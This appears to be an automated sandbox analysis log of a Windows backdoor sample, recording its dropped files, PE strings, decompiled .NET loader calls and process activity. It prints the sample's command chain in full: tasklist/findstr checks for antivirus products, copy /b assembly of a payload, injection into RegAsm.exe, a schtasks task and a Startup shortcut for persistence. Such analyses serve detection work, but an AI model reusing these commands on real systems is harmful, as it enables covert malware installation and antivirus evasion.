Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static file information: File size 10515536 > 1048576
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source: Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs .Net Code: Memory
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs .Net Code: Memory
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs .Net Code: Memory
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs .Net Code: Memory
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs .Net Code: Memory
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_00445FC8
Source: Northeast.0.dr Static PE information: real checksum: 0xf6bf3 should be: 0x42226
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004902D8 push cs; retn 0048h 11_2_00490318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00460DE6 push ecx; ret 11_2_00460DF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0045DC7C push AA0049CFh; iretd 11_2_0045DC87

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_004D26DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0045FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_0045FC7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Memory allocated: 2B70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Memory allocated: 2D10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Memory allocated: 4D10000 memory reserve | memory write watch
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Window / User API: threadDelayed 5579
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528 Thread sleep count: 5579 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528 Thread sleep time: -55790s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Thread sleep count: Count: 5579 delay: -10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_00406850 FindFirstFileW,FindClose, 0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0047C622 FindFirstFileExW, 11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose, 11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B7333 FindFirstFileW,FindClose, 11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_004B73D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_00445FC8
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: Telecom.pif, 0000000B.00000002.2443431960.0000000003ABB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BF4FF BlockInput, 11_2_004BF4FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_0044338B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_00445FC8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00465058 mov eax, dword ptr fs:[00000030h] 11_2_00465058
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 11_2_004A20AA
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00472992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00472992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00460BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00460BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00460D45 SetUnhandledExceptionFilter, 11_2_00460D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00460F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00460F91
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: D7D000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_004A1B4D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_0044338B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004ABBED SendInput,keybd_event, 11_2_004ABBED
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AEC6C mouse_event, 11_2_004AEC6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 11_2_004A14AE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 11_2_004A1FB0
